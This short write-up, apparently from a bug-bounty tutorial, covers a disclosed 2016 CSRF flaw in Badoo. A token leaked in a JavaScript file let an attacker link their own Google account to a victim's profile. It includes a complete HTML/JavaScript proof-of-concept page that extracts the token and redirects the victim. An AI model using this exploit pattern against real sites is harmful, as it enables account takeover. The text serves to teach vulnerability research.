On April 12th, 2016, the bug bounty hunter Mahmoud G. published a critical vulnerability in Badoo. Using a CSRF attack, it allows you to add other recovery accounts to hijack any Badoo user account.
Mahmoud G. discovered the following call, when a user added a Gmail account to their Badoo profile:
https://eu1.badoo.com/google/verify.phtml?rt=<State_param_value>&code=<Code_returned_from_google>
Unlike the previous vulnerabilities that have been reviewed, in this case, the request has an rt parameter, which protects the request from a CSRF attack. To find it, Mahmoud G. reviewed each request until they found the value in a .js file. It is included in the following line:
var url_stats = 'https://eu1.badoo.com/chrome-push-stats?ws=1&rt=<rt_param_value>';
With all the elements to perform the attack, Mahmoud G. wrote the following proof of concept to exploit the vulnerability:
<html>
<head>
<title>Badoo account take over</title>
<script src=https://eu1.badoo.com/worker-scope/chrome-service-worker.js?ws=1></script>
</head>
<body>
<script>
function getCSRFcode(str) {
return str.split('=')[2];
}
window.onload = function(){
var csrf_code = getCSRFcode(url_stats);
csrf_url = 'https://eu1.badoo.com/google/verify.phtml?code=4/nprfspM3yfn2SFUBear08KQaXo609JkArgoju1gZ6Pc&authuser=3&session_state=7cb85df679219ce71044666c7be3e037ff54b560..a810&prompt=none&rt='+ csrf_code;
window.location = csrf_url;
};
</script>
After a user linked the external account, the modification is done, exploiting the vulnerability.
The tip you can extract from this vulnerability is that sometimes, tokens are used to protect the information, not just in the case of CSRF, but in many cases; this could be in other files, even files that are not so important for the application, like a .js in this case.